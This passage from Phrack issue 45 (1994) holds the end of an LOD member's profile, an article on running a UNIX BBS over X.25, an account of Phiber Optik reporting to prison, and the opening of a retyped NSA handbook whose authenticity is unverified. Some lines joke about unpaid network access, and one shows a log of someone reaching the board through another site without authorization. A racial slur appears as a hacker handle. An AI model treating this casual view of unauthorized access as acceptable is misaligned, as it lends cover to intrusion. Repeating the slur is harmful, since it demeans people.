My Mentor. He taught me about UNIX and Phone Company Computer and Networks. Taught me how to engineer. Was a great friend. We talked 3-4 times a day for a yea or so. Haven't talked to him much lately. Hope everything is going well for you, Bill... Lex Luthor - Mr. LOD! U R Out of Control! Lex is a great guy. There have been rumors about him floating around for years. Let me tell you. They are all false. He is the greatest guy. At SummerCon he was pretty mellow. He stayed at my house for a week or two. He was a blast. I have pictures of Him, Bad Subscript and me sitting on a dumpster outside EDS, and painted on the dumpster it says "Computer Papers Only". Also have picture of him and I outside a funeral home with the address "2600" in BIG letters. Now he has been denying this outside in his underwear story for years. Here it is. Lex stayed at my house for a few weeks. I hooked him up with this girl (she was HOT.. And he was tearing it up with her every night). Well we went to Motel Sex (Motel 6) one night and were drinking pretty heavy. At about 0100 in the morning he went out of his room in his underwear. Now the doors to the rooms are outside. And was kicking my door yelling "We need more Beer!". I think it was blown a little out of proportion. I hear a story that he was running around the parking lot or something. But that is the story...anyway he's a great guy. Phantom Phreaker - Fellow LOD Member. FUN FUN FUN. He is one of the friendliest people I have ever meet. He is a blast to party with. Love the hair! He has good things to say about everyone. I have never meet anyone that knows more about Switching System and such than him. He is a walking phone company manual. BTW: How's your balls? (Private Joke) Doom Prophet - Fellow LOD Member. Phantom Phreaker's Twin Brother. Haven't seen much of him the last few years. Another walking manual. Hope you're doing good. The Marauder - Fellow LOD Member. I really got along great with him.. Didn't see much of him the second night. He and Phantom Phreaker were hiding...but he was really a great guy! Taran King/Knight Lightning - Got me into the "Elite" Scene. I really like you guys. Always a lot of fun. Don't see much of you anymore at the SummerCons. Train King is off with this woman, now wife. Congratulations.. Hope you are happy forever And Knight Lightning is on the run from the Hotel manager who is running around asking everyone "Are you Craig Nedordorf?". Erik Bloodaxe - Fellow LOD Member. We have been completely "Out of Control" together. He is a blast. We have had our differences, and I don't really know why. But I really like him. He is BIG fun! I didn't see much of you at the last SummerCon. Hope to talk to you more in the Future! Forest Ranger - JT. What a great and fun guy. In the past we didn't hang out too much, but last year at SummerCon we really had a great time together. What a ladies' man! Hope to see you soon. Give me a call...maybe you can come to Detroit with L666 and go to the Gran Prix. I'm getting us all pit passes! The Mentor - Fellow LOD Member. Great guy. We got into LOD/H together. Haven't heard much from him lately. Hope all is well. The Prophet/The UrVile/The Leftist - Fellow LOD Members. The three of us really got along great. We were always together at the SummerCons. We talked 5000000 times a day on the phone. I really liked them. They were really cool.. Then............ What the FUCK! The government flew them to Detroit to testify in front of the grand jury against me. No problem--you do what you gotta do. But if you're in town you could at least give me a call after all we have been through together. That was really weak. And don't return my calls 3 years later... Whatever! Dispater - All around fun guy. Didn't go to SummerCon last year. I know Erreth Akbe was bummed. He was really looking forward to seeing you. I'm not going this year, but if I *WAS*, I would really like to see ya. High Evolutionary - We have never met, but in the mid 80's we talked daily. Haven't heard anything about him in years. He was really a smart guy. Hope all is well. Psychic Warlord - Great guy. Sysop of ShadowSpawn. We hung around A LOT in the old days. I understand you are getting married. Congratulations. Hope I'm invited. Mitch Kapor (Programmer of LOTUS) - You know why Mitch. I thank you much. If you ever need anything. You have my phone number! Jim F - He helped me out of a LOT of problems.. Thanks Jim! (Please Note: These are in no special order. If you are on the top of the list or the bottom it has no relation to your importance on the list.) --------------------------------------------------------------------- What I think of the Future of the Underground: Ahahaha.. LAME, LAME, LAME.. In the old days we were the first to do things. We would get on a system and play with it for hours. It was a quest for knowledge. That was what LOD/H was all about. Today's new "hackers" are really assholes. They don't do it to learn. They want to mess things up. I really can't stand the new anarchy thing that is going around. We have kids logging onto the BBS that say "I have 400+ viruses". Well.. That's not cool. The purpose of hacking is to learn. Learn the way a computer system runs. Learn how the telephone switching systems work. Learn how a packet switching network works. It's not to destroy things or make other peoples lives a mess by deleting all the work they did for the past week. The reason the Department of Justice has crackdowns on computer hackers is because so many of them are destructive. That's just stupid criminal behavior and I hope they all get busted. They shouldn't be around. You give real hackers a bad name. ---------------------------------------------------------------------- Other Things to Mention: The "NEW Legion of Doom" - Beyond Lame. It is my understanding that some lame kid from Canada (eh!) was starting a "New LOD". Well those kids couldn't hack their way into, let alone out of a Cracker Jack box. If they are on you BBS.. Delete them! They have absolutely no affiliation with the real Legion of Doom! DrunkFux - Jessie, I have been trying to get a hold of you for a year now. If you could get my number and call me. Or call our board (810)683-9722 and leave me your phone number. I would like to get Dena's phone number from you. ---------------------------------------------------------------------- In the late 80's someone call forwarded my home phone to a Voice Mail Box.. I heard it was SuperNigger, but he says not.. I thought you guys might get a kick out of the message left on it. My name's Control C.. AKA Phase Jitter of LOD! Elite as can be... I thought that was Me! Until they forwarded my number to a V.M.B. ---------------------------------------------------------------------- Well that's about it.. My final words of wisdom... Call our board.. It's 3l33t! Control C Legion of Doom/Hackers 1994 From phrack@well.sf.ca.us Thu Mar 31 18:39:54 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18072; Thu, 31 Mar 94 18:39:44 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id XAA00461; Wed, 30 Mar 1994 23:40:41 -0800 Date: Wed, 30 Mar 1994 23:40:41 -0800 From: Chris Goggans Message-Id: <199403310740.XAA00461@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-08 Status: OR ==Phrack Magazine== Volume Five, Issue Forty-Five, File 8 of 28 **************************************************************************** Running a Board on x.25 ======================= In this article, I want to inform the reader about advantages, problems, experiences and fun about running a BBS on x.25. I also want to do a few comparisons between x.25 on one hand and the Internet and phone system on the other. This article may also help you to setup a BBS on a UNIX, no matter if on x.25 or not. I. Systems on x.25... ========================== In my article for Phrack 42 about the German scene (read it if you haven't done so yet! :-) I also mentioned the x.25 scene and a few Bulletin Board Systems (BBS / boards) on it. One of the most popular ones, LUTZIFER, just went down on December 20, 1993. Lutzifer used to be one of the most popular x.25 boards back in 1990 and early 1991, when US people were still able to use Tymnet ("video" and "parmaster") and Sprintnet without much of a hassle. I spoke with Lutz (sysop of Lutzifer) at the CCC Congress in Hamburg a week later. He told me that he first just wanted to change the speed for his x.25 connection from 9600 to 2400 to save some money (actually 50%), because he didn't get too many calls anyway. But the German Telekom (who handle x.25 AND the phone lines) wanted him to cancel his old x.25 connection, get a new NUA, pay the $300 installation fee, all to get a 2400 bps connection. This really made Lutz mad, and he finally decided to cancel all x.25 - so goodbye to Lutzifer! On the other side, QSD (the lamest chat system one can imagine) is still up and running on x.25. Back in Summer 1993, there have been many rumors that QSD would go down. It wasn't reachable from most networks in the world anymore, including Sprintnet, Datex-P and others. They were probably just "testing" something - but QSD will never have its >80 online users again (sounds pretty ridiculous compared to IRC :) that it had back in the good old days. II. Advantages of x.25 ========================== You may wonder what the advantages of running a board on x.25 are. Wouldn't an Internet link or a phone dialup be enough? In fact, the Internet is getting more and more popular, the number of its hosts is increasing dramatically. This, and the fact that ISDN is faster and available to more and more people at cheaper rates, makes x.25 seem unattractive. But x.25 is a very old and safe network. It hasn't really changed in 10 years. There are hardly any netsplits like on the Internet, and it has a very low rate of data errors. X.25 is available in almost every country (far over 200) in the world, even in countries that never heard of Internet like Mauritius or United Arab Emirates. This means that a lot of people from all over the world can call you at a cheap rate (at least cheaper than international phone charges, for some people even free at all :). To the sysop it offers a couple of features that modems can't offer, and where the Internet isn't safe enough. This is also a reason why most banks, insurances and credit agencies still rely on x.25. I will describe those features in the next chapter. III. Setting up your X.25 board ================================== So let's get practical after all this boring theory! How do you start if you want to setup your own x.25 board? First of all, you need your own x.25 line. In most countries your phone company would be responsible; in a few countries like the US you may even have a choice of different x.25 providers like "Sprintnet". The prices for those lines really vary. You may check the Sprintnet or Tymnet Toll Free information service, that also gives you information and prices about other countries. E.g. in Germany a 2400 bps (the slowest) link would be US$130 a month, a 9600 bps link about $260. The good thing though is that each additional virtual channel is just $3 more per month (in Germany). A number of 16 channels is typical and 128 channels aren't exotic. But remember, all channels have to share the maximum bandwidth of - let's say - 9600 bps. So if 10 people would start to leech the latest Phrack at the same time, they would all just have 960 bps each or 96 cps. But downloading isn't always that easy. In fact, many of my users have been reporting problems while trying to download. While a few x.25 networks like Datapak Norway and German Datex-P are true 8 bit networks, many networks and PADs just handle 7 bit connections. It's not always that easy to transfer binaries at 7 bit, though it was possible for me to download from a Sprintnet dialup using a 'good' version of Z-Modem. X.25 is not the right choice if you want to transfer huge amounts of data anyway. It is meant for people who work interactively. It is recommended for people who want to do a database research, read and write email and news or just chat. You will also notice that, if you are a paying x.25 user (aren't you all :-) and get your bills, connection time is really cheap; up to 70 times cheaper than long distance phone charges. What counts are the transmitted bytes, no matter how fast you are! You easily pay $30 for transferring 1 MB. But what else do you need after you got your x.25 link? You need a PC (which doesn't have to be fast; I was using a 386sx for quite some time. In fact, my new 486/40 board is 'too fast' for my old x.25 8 bit adaptor :). It might also be interesting to run it on a Sun or HP workstation; but the x.25 cards for those machines are rather expensive. Then you need a good operating system. Don't even think of running DOS. You want to have a multi-user multi-tasking system after all, don't you? So your choice is UNIX. Systems with pretty good x.25 solutions are Interactive and SCO Unix. They are both old fashioned System V / 386's, but are running safely, hardly ever crash and are popular in the commercial world. I chose Interactive. How do you connect your PC to the x.25 line? Good guess. Yes, you need an adaptor card. I got an EICON/PC card. EICON cards are probably the best supported and most common x.25 cards - they are made in Canada. However, they aren't cheap. Usually they are around $1000, if you are lucky you could get a used one for $600. You might get a cheaper x.25 adaptor, but check in advance if the software you want to use supports that adaptor. There is no real standard concerning x.25 cards! Anything else you need? Yes, the most important thing - the software. UNIX doesn't come with x.25 drivers. However, there is a really good x.25 solution available from netCS Software in Berlin, Germany. (The company was co-founded by "Pengo" Hans H. Send them mail to postmaster@netcs.com for info.) IV. Features ================ This software, and x.25 in general, has a few nice features. If you receive an x.25 call from somewhere, the NUA ("Network User Address") of the caller is being transmitted to you. This works pretty much like Caller-ID, with the exception that the caller can't prevent it from being transmitted, and he usually can't fake the address he is calling from. Of course he can call through a couple of systems, and you would just see the NUA of the last system he calls you from. This feature can easily be used to accept or reject calls from certain NUAs/systems or whole countries. Many systems like banks just allow certain NUAs to call them, just the ones that they know. You could also give different access to different people: people from country A may login to your system, country B may just write you a mail, all other countries are forced into chat and the NUA of CERT is being rejected and received a "nice" goodbye message. Of course you will also keep a logfile (and 99% of the systems you call will have a logfile with YOUR call and the calls you might place using its pad). This logfile usually contains the NUA that calls you (or that is being called), the programs that are being executed, the userid of the caller, duration, reason for termination and more. Another interesting feature is the 'Call User Data' (CUD). The caller may transmit up to 16 bytes (default is 4 bytes) to your host before he establishes an x.25 connection. In these bytes he may send you a Service Request. The default CUD is 01/00/00/00 and means 'interactive login'. You may define any CUD you want and just accept calls that use that certain CUD - it would work like a system password then. Many systems may also have a service request that allows the caller to execute commands on that host remotely, without supplying any additional password (be aware of this!) For more technical information about x.25 read one of the articles in the previous issues of Phrack. I am glad that Phrack is still covering x.25 with plenty of interesting articles after all these years! IV. Chosing the BBS Software ================================ Okay. Now we decided to choose UNIX as operating system. Of course, you could give all your users shell access, create a guest account with limited shell access and a chat account that kicks you just into chat. That's what I used to do first. But since we want to run an open system and give accounts to many hackers, it might be a scary vision that all of them have shell access and try to hack your system. This is the point when you are looking for a BBS software for UNIX. There aren't too many free BBSes for UNIX around, most of them cost some hundred dollars (check out the latest Boardwatch issue for more information). However, I found a pretty decent BBS software called 'Uniboard'. It runs fine on most System V's including Interactive and SCO; versions for Sun OS and Linux are available too. It offers you a nice colorful (you may turn it to black & white) menu driven interface. You have to have C-News and sendmail installed and running. Instead of sendmail I use smail, which is bug-free, much easier to install and offers at least the same features. C-News though isn't that easy to install and takes quite some time and document reading. But these packages are used by Uniboard for messages (news) and email. This is pretty nice, because you can just exchange mail with everyone on the Internet. You can also read your favorite newsgroups in Uniboard like alt.sex.bondage and post to local groups. The filebase is designed okay, but it doesn't feature the concept of ratios yet. (You just get one byte download ability for each byte you upload!). Rick, the author, promised me to put it into the next version though. The biggest drawback is that you will just get the binary, no sources available, so you can't put in all the features you would like. For more information send email to the author Rick in Italy at pizzi@nervous.com. He will give you a free demo key that works for a few weeks, if you ask him. Afterwards you could get a key for $40 and more, depending how many users you want to have. V. How to get more users ============================= You may think: Okay, fine. But not everybody has x.25 access, though (almost) everybody has Internet access. How could these people call me? Well, the solution isn't easy. I was told though that someone installed an Internet site that would forward the call through an x.25 PAD to my system. Of course, the system administrator of that Internet site found out after a while and installed the following banner (he obviously has a sense of humor :) - someone sent me this log: telnet> open pythia.csi.forth.gr 2600 Trying 139.91.1.1 ... Connected to pythia.csi.forth.gr. Escape character is '^]'. Welcome to Sectec Direct. Please hold the line. :) Calling...connected... MUniBoard v. 1.12 400 users Runtime System S/N 345968791 Licensed for single machine use to Seven Down on sectec Unauthorized duplication allowed Loading.. ________________________________________________ /~ .~ / _ . ~/~ _ . |~ __ ~| _ . \~ _ _ ~/ // ____/_ |_\__/. | \__|. |__| | |_\__/\/ | | \/ /____ ~/ _|__|| | __|: _| _|__ || | // . //: |_/. \: |_/. || |\ \\: |_/. \ |: | /_____ /|________\______|__| \__\_______\ |__| ___________________________________________ ___________________ \~ _ _ ~/ _ . ~/ _ .\~ _ _ ~/ __ |~ ~\ |~~|~| _ . ~/~ .~ / \/ | | \/ |_\__/ | \__\/ | | \/ / \|| \| || || \__// ____/_ || | || _|__| | __ || | \\ \ /|: \ \ :| || ______ ~/ |: | |: |_/. \ |_/. \ |: | \ \/ || |\ .| ||_/. \/ . // |__| |________\______\ |__| \____|__| \___|_|______\___ / Dear fellow hacker, Please use YOUR telephone to make long distance calls Using other's systems over the Internet is just NOT fair let alone that is ILLEGAL. Anyway, your hosts computer names/IP addresses and location, as well as accurate logs of most of your recent/6 months unauthorized calls are in file and might be used against you in court. Legal service courtesy of FIRST/CERT sorry if we ruined your day... Connection closed by foreign host. V. Modem Ports =================== Also, every board on x.25 should have a direct modem dialup (and I guess every board does! The dialup for Lutzifer wasn't public, but it had one!) You need to have a modem at least for uucp polling of news and mail. If you are running UNIX, you don't need one of those really expensive 'intelligent' cards like DigiBoard for $1000. But make sure you have a 16550 chip on your I/O controller or you won't be happy. A pretty good deal are AST compatible cards with 4 ports. You can get them for $60 if you are lucky. They just use one IRQ for all 4 ports and let you select the IRQ and the base addresses. This is pretty convenient, because it is even more likely to get an IRQ conflict under UNIX than under DOS. Try to get a card with 16550's on it, or one that has sockets that let you replace the old 16450's or whatever with 16550's, without playing with your soldering iron. If you buy 16550's, try to get the original NS (National Semiconductor) ones: NS16550AFN; Texas Instrument's aren't as good. Then you should get a good serial port driver like the excellent FAS 2.10. It is quite flexible with default drivers for AST compatible and standard I/O cards, supports speeds up to 115,200 bps, and supports both incoming and outgoing calls on the same line very well. It only works with System V though. I can't help smiling when people tell me about their ElEeT WaR3Z boards running on DOS and Novell with a separate PC for each node. With the configuration mentioned above, you can easily have 4 or 8 high speed modems with a host speed of 57.600 connected to a single 386 PC and no performance loss. Email me for information or accounts, or just send me love letters :) sec@g386bsd.first.gmd.de. by Seven Up (damiano @ irc) From phrack@well.sf.ca.us Thu Mar 31 18:20:37 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18041; Thu, 31 Mar 94 18:20:24 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id XAA00589; Wed, 30 Mar 1994 23:41:06 -0800 Date: Wed, 30 Mar 1994 23:41:06 -0800 From: Chris Goggans Message-Id: <199403310741.XAA00589@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-09 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 9 of 28 **************************************************************************** No Time For Goodbyes Phiber Optik's Journey to Prison by Emmanuel Goldstein It was almost like looking forward to something. That's the feeling we all had as we started out on Thursday evening, January 6th - one day before Phiber Optik (hereafter called Mark) was to report to federal prison in Schuylkill, Pennsylvania for his undefined part in an undefined conspiracy. We were all hackers of one sort or another and this trip to a prison was actually a sort of adventure for us. We knew Mark's curiosity had been piqued as well, though not to the point of outweighing the dread of the unknown and the emotional drain of losing a year of life with friends, family, and technology. There were five of us who would take the trip down to Philadelphia in a car meant for four - myself, Mark, Walter, Roman, and Rob. The plan was to meet up with 2600 people in Philadelphia on Thursday, drive out to Schuylkill and drop Mark off on Friday, drive back and go to the Philadelphia 2600 meeting, and return later that evening. It sure sounded better than sending him away on a prison bus. Knocking on the door of his family's house in Queens that frigid night, a very weird feeling came over me. How many times had I stood there before to take Mark to a conference, a hacker meeting, a radio show, whatever. Today I was there to separate him from everything he knew. I felt like I had somehow become part of the process, that I was an agent of the government sent there to finish the dirty work that they had begun. It doesn't take a whole lot to join the gestapo, I realized. I talked to Mark's father for the very first time that night. I had chatted with his mother on a number of occasions but never his father before then. He was putting on as brave a front as he could, looking at any glimmer of optimism as the shape reality would take. The prison wouldn't be that bad, he would be treated like a human being, they'd try to visit on the weekends, and anything else that could help make this seem like an extended vacation. As long as he learns to keep his mouth shut and not annoy anyone, he'll be all right. Of course, we both knew full well that Mark's forthright approach *always* managed to annoy somebody, albeit usually only until they got to know him a little. Imagining Mark fading into the background just wasn't something we could do. Everything in Mark's room was neatly arranged and ready to greet him upon his return - his computer, manuals, a videotape of "Monty Python and the Holy Grail" with extra footage that a friend had sent him (I convinced him to let me borrow it), a first edition of "Hackers" that Steven Levy had just given him, and tons of other items that could keep anyone occupied for hours. In fact, he was occupied when I got there - he and Walter were trying to solve a terminal emulation problem. My gestapo duties forced me to get him going. It was getting late and we had to be in Philadelphia at a reasonable time, especially since it was supposed to start snowing at any moment. And so, the final goodbyes were said - Mark's mother was especially worried that he might forget part of his medication or that they'd have difficulty getting him refills. (In fact, everyone involved in his case couldn't understand why Mark's serious health problems had never been mentioned during the whole ordeal or considered during sentencing.) The rest of us waited in the car so he could have some final moments of privacy - and also so we wouldn't have to pretend to smile while watching a family being pulled apart in front of us, all in the name of sending a message to other hackers. Our drive was like almost any other. We talked about the previous night's radio show, argued about software, discussed nuances of Star Trek, and managed to get lost before we even left New York. (Somehow we couldn't figure out how the BQE southbound connected with the Verrazano Bridge which led to an extended stay in Brooklyn.) We talked about ECHO, the system that Mark has been working on over the past year and how, since Wednesday, a couple of dozen users had changed their last names to Optik as a tribute. It meant a lot to him. When you're in a car with five hackers, there's rarely any quiet moments and the time goes by pretty quickly. So we arrived in Philadelphia and (after getting lost again) found our way to South Street and Jim's Cheesesteaks, a place I had always wanted to take Mark to, since he has such an affinity to red meat. Jim's is one of my favorite places in the world and we soon became very comfortable there. We met up with Bernie S. and some of the other Philadelphia hackers and had a great time playing with laptops and scanners while eating cheesesteaks. The people at Jim's were fascinated by us and asked all kinds of questions about computers and things. We've had so many gatherings like this in the past, but it was pretty cool to just pull into a strange city and have it happen again. The karma was good. We wound up back at Bernie S.'s house where we exchanged theories and experiences of our various cable and phone companies, played around with scanners, and just tried to act like everything was as normal as ever. We also went to an all-night supermarket to find Pennsylvania things: TastyKakes, Pennsylvania Dutch pretzels, and pickles that we found out were really from Brooklyn. We managed to confuse the hell out of the bar code reader by passing a copy of 2600 over it - the system hung for at least a minute! It was around five in the morning when one of us finally asked the question: "Just when exactly does Mark have to be at this prison?" We decided to call them right then and there to find out. The person answering the phone was nice enough - she said he had until 11:59 pm before he was considered a fugitive. This was very good news - it meant a few more hours of freedom and Mark was happy that he'd get to go to the Philadelphia meeting after all. As we drifted off to sleep with the sun rising, we tried to outdo each other with trivial information about foreign countries. Mark was particularly good with obscure African nations of years past while I was the only one who knew what had become of Burma. All told, not a bad last day. Prison Day arrived and we all got up at the same moment (2:03 pm) because Bernie S. sounded an airhorn in the living room. Crude, but effective. As we recharged ourselves, it quickly became apparent that this was a very bizarre day. During the overnight, the entire region had been paralyzed by a freak ice storm - something I hadn't seen in 16 years and most of the rest of us had never experienced. We turned on the TV - interstates were closed, power was failing, cars were moving sideways, people were falling down.... This was definitely cool. But what about Mark? How could we get him to prison with roads closed and treacherous conditions everywhere? His prison was about two hours away in the direction of wilderness and mining towns. If the city was paralyzed, the sticks must be amputated entirely! So we called the prison again. Bernie S. did the talking, as he had done the night before. This time, he wound up getting transferred a couple of times. They weren't able to find Mark's name anywhere. But that good fortune didn't last - "Oh yeah, I know who you're talking about," the person on the phone said. Bernie explained the situation to them and said that the State Troopers were telling people not to travel. So what were we to do? "Well," the friendly-sounding voice on the other end said, "just get here when you can get here." We were overjoyed. Yet more freedom for Mark all because of a freak of nature! I told Bernie that he had already been more successful than Mark's lawyer in keeping him out of prison. We spent the afternoon getting ready for the meeting, watching The Weather Channel, and consuming tea and TastyKakes in front of a roaring fire. At one point we turned to a channel that was hawking computer education videos for kids. "These children," the fake schoolteacher was saying with equally fake enthusiasm, "are going to be at such an advantage because they're taking an early interest in computers." "Yeah," we heard Mark say with feigned glee from another room, "they may get to experience *prison* for a year!" It took about 45 minutes to get all of the ice off our cars. Negotiating hills and corners became a matter of great concern. But we made it to the meeting, which took place in the middle of 30th Street Station, where all of the Amtrak trains were two and a half hours late. Because of the weather, attendance was less than usual but the people that showed up were enthusiastic and glad to meet Phiber Optik as he passed by on his way up the river. After the meeting we found a huge tunnel system to explore, complete with steampipes and "Poseidon Adventure" rooms. Everywhere we went, there were corridors leading to new mysteries and strange sights. It was amazing to think that the moment when everybody figured Mark would be in prison, here he was with us wandering around in the bowels of a strange city. The karma was great. But then the real fun began. We decided to head back to South Street to find slow food - in fact, what would probably be Mark's last genuine meal. But Philadelphia was not like New York. When the city is paralyzed, it really is paralyzed. Stores close and people stay home, even on a Friday night. We wanted to take him to a Thai place but both of the ones we knew of were closed. We embarked on a lengthy search by foot for an open food place. The sidewalks and the streets were completely encased in ice. Like drunken sailors in slow motion, we all staggered down the narrow streets, no longer so much concerned with food, but just content to remain upright. People, even dogs, were slipping and falling all around us. We did our best to maintain dignity but hysterical laughter soon took over because the situation was too absurd to believe. Here we were in a strange city, unable to stand upright in a veritable ice palace, trying to figure out a way to get one of our own into a prison. I knew it was going to be a strange trip but this could easily beat any drug. We ate like kings in a Greek place somewhere for a couple of hours, then walked and crawled back to the cars. The plan now was to take Mark to prison on Saturday when hopefully the roads would be passable. Actually, we were all hoping this would go on for a while longer but we knew it had to end at some point. So, after a stop at an all-night supermarket that had no power and was forced to ring up everything by hand, we made it back to Bernie's for what would really be Mark's last free night. It was well after midnight and Mark was now officially late for prison. (Mark has a reputation for being late to things but at least this time the elements could take the blame.) We wound up watching the "Holy Grail" videotape until it was practically light again. One of the last things I remember was hearing Mark say how he wanted to sleep as little as possible so he could be awake and free longer. We left Bernie's late Saturday afternoon. It was sad because the aura had been so positive and now it was definitely ending. We were leaving the warmth of a house with a fireplace and a conversation pit, journeying into the wild and the darkness with wind chill factors well below zero. And this time, we weren't coming back. We took two cars - Bernie and Rob in one; me, Mark, Walter, and Roman in the other. We kept in touch with two way radios which was a very good idea considering the number of wrong turns we always manage to make. We passed through darkened towns and alien landscapes, keeping track of the number of places left to go through. We found a convenience store that had six foot tall beef jerky and Camel Light Wides. Since Mark smokes Camel Lights (he had managed to quit but all of the stress of the past year has gotten him right back into it), and since he had never heard of the wide version, I figured he'd like to compare the two, so I bought him a pack. I never buy cigarettes for anyone because I can't stand them and I think they're death sticks but in this case I knew they'd be therapeutic. As we stood out there in the single digits - him with his Wides, me with my iced tea - he said he could definitely feel more smoke per inch. And, for some reason, I was glad to hear it. Minersville was our final destination but we had one more town to pass through - Frackville. Yeah, no shit. It was the final dose of that magical karma we needed. As we looked down the streets of this tiny town, we tried to find a sign that maybe we could take a picture of, since nobody would ever believe us. We pulled up to a convenience store as two cops were going in. And that's when we realized what we had been sent there to do. Bernie S. went in to talk to the cops and when he came out, he had convinced them to pose with Mark in front of their squad car. (It didn't really take much convincing - they were amazed that anyone would care.) So, if the pictures come out, you can expect to see a shot of Phiber Optik being "arrested" by the Frackville police, all with big smiles on their faces. Frackville, incidentally, has a population of about 5,000 which I'm told is about the distribution of Phrack Magazine. Kinda cosmic. So now there was nothing left to do. We couldn't even get lost - the prison was straight ahead of us. Our long journey was about to come to a close. But it had been incredible from the start; there was no reason to believe the magic would end here. The prison people would be friendly, maybe we'd chat with them for a while. They'd make hot chocolate. All right, maybe not. But everybody would part on good terms. We'd all give Mark a hug. Our sadness would be countered by hope. The compound was huge and brightly lit. We drove through it for miles before reaching the administration building. We assumed this was where Mark should check in so we parked the cars there and took a couple of final videos from our camcorder. Mark was nervous but he was still Mark. "I think the message is 'come here in the summer,'" he said to the camera as we shivered uncontrollably in the biting freeze. As we got to the door of the administration building, we found it to be locked. We started looking for side doors or any other way to get in. "There's not a record of people breaking *into* prison," Bernie wondered out loud. It was still more craziness. Could they actually be closed? I drove down the road to another building and a dead end. Bernie called the prison from his cellular phone. He told them he was in front of the administration building and he wanted to check somebody in. They were very confused and said there was no way he could be there. He insisted he was and told them he was in his car. "You have a *car* phone?" they asked in amazement. When the dust settled, they said to come down to the building at the end of the road where I was already parked. We waited around for a couple of minutes until we saw some movement inside. Then we all got out and started the final steps of our trip. I was the first one to get to the door. A middle-aged bespectacled guy was there. I said hi to him but he said nothing and fixed his gaze on the five other people behind me. "All right, who's from the immediate family?" "None of us are immediate family. We're just--" "Who's the individual reporting in?" "I'm the individual reporting in," Mark said quietly. "The only one I need is just him." The guard asked Mark if he had anything on him worth more than $100. Mark said he didn't. The guard turned to us. "All right, gentlemen. He's ours. Y'all can depart." They pulled him inside and he was gone. No time for goodbyes from any of us - it happened that fast. It wasn't supposed to have been like this; there was so much to convey in those final moments. Mark, we're with you... Hang in there... We'll come and visit.... Just a fucking goodbye for God's sake. It caught us all totally off guard. They were treating him like a maximum security inmate. And they treated us like we were nothing, like we hadn't been through this whole thing together, like we hadn't just embarked on this crazy adventure for the last few days. The karma was gone. From behind the door, a hooded figure appeared holding handcuffs. He looked through the glass at us as we were turning to leave. Suddenly, he opened the outer door and pointed to our camera. "You can't be videotaping the prison here," he said. "All right," I replied, being the closest one to him and the last to start back to the cars. As I turned away, he came forward and said, "We gotta have that film." "But we didn't take any pictures of the prison!" I objected. "We gotta take it anyway," he insisted. We all knew what to do. Giving up the tape would mean losing all recordings of Mark's last days of freedom. The meeting in Philadelphia, slipping down the icy streets, hanging out in Bernie's house, Frackville.... No way. No fucking way. Roman, who had been our cameraman throughout, carefully passed off the camera to Bernie, who quickly got to the front of the group. I stayed behind to continue insisting that we hadn't filmed any part of their precious prison. I didn't even get into the fact that there are no signs up anywhere saying this and that it appeared to me that he was imposing this rule just to be a prick. Not that I would have, since Mark was somewhere inside that building and anything we did could have repercussions for him. Fortunately, the hooded guard appeared to conclude that even if he was able to grab our camera, he'd probably never find the tape. And he never would have. The hooded guard stepped back inside and we went on our way. If it had been dark and cold before, now it was especially so. And we all felt the emptiness that had replaced Mark, who had been an active part of our conversations only a couple of minutes earlier. We fully expected to be stopped or chased at any moment for the "trouble" we had caused. It was a long ride out of the compound. We headed for the nearest major town: Pottsville. There, we went to the only 24 hour anything in miles, a breakfast/burger joint called Coney Island of all things. We just kind of sat there for awhile, not really knowing what to say and feeling like real solid shit. Roman took out the camcorder and started looking through the view screen. "We got it," he said. "We got it all." Looking at the tape, the things that really hit me hard are the happy things. Seeing the cops of Frackville posing and laughing with Mark, only a few minutes before that ugly episode, puts a feeling of lead in my stomach. I'm just glad we gave him a hell of a sendoff; memories of it will give him strength to get through this. What sticks with me the most is the way Mark never changed, right up to the end. He kept his incredible sense of humor, his caustic wit, his curiosity and sense of adventure. And he never stopped being a hacker in the true sense. What would a year of this environment do to such a person? Our long ride back to New York was pretty quiet for the most part. Occasionally we'd talk about what happened and then we'd be alone with our thoughts. My thoughts are disturbing. I know what I saw was wrong. I know one day we'll realize this was a horrible thing to do to somebody in the prime of life. I don't doubt any of that. What I worry about is what the cost will be. What will happen to these bright, enthusiastic, and courageous people I've come to know and love? How many of us will give up and become embittered shells of the full individuals we started out as? Already, I've caught myself muttering aloud several times, something new for me. Mark was not the only one, not by far. But he was a symbol - even the judge told him that at the sentencing. And a message was sent, as our system of justice is so fond of doing. But this time another message was sent - this one from Mark, his friends, and the scores of other hackers who spoke up. Everybody knew this wasn't right. All through this emotional sinkhole, our tears come from sadness and from anger. And, to quote the Clash, "Anger can be power." Now we just have to learn to use it. Mark Abene #32109-054 FPC, Schuylkill Unit 1 PO Box 670 Minersville, PA 17954-0670 [Letters, paperback books, and photos are acceptable. Virtually nothing else is. And remember that everything will be looked at by prison people first.] From phrack@well.sf.ca.us Thu Mar 31 22:56:53 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18910; Thu, 31 Mar 94 22:56:28 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id XAA00668; Wed, 30 Mar 1994 23:41:27 -0800 Date: Wed, 30 Mar 1994 23:41:27 -0800 From: Chris Goggans Message-Id: <199403310741.XAA00668@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-10 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 10 of 28 **************************************************************************** [NOTE: This file was retyped from an anonymous photocopied submission. The authenticity of it was not verified.] Security Guidelines This handbook is designed to introduce you to some of the basic security principles and procedures with which all NSA employees must comply. It highlights some of your security responsibilities, and provides guidelines for answering questions you may be asked concerning your association with this Agency. Although you will be busy during the forthcoming weeks learning your job, meeting co-workers, and becoming accustomed to a new work environment, you are urged to become familiar with the security information contained in this handbook. Please note that a listing of telephone numbers is provided at the end of this handbook should you have any questions or concerns. Introduction In joining NSA you have been given an opportunity to participate in the activities of one of the most important intelligence organizations of the United States Government. At the same time, you have also assumed a trust which carries with it a most important individual responsibility--the safeguarding of sensitive information vital to the security of our nation. While it is impossible to estimate in actual dollars and cents the value of the work being conducted by this Agency, the information to which you will have access at NSA is without question critically important to the defense of the United States. Since this information may be useful only if it is kept secret, it requires a very special measure of 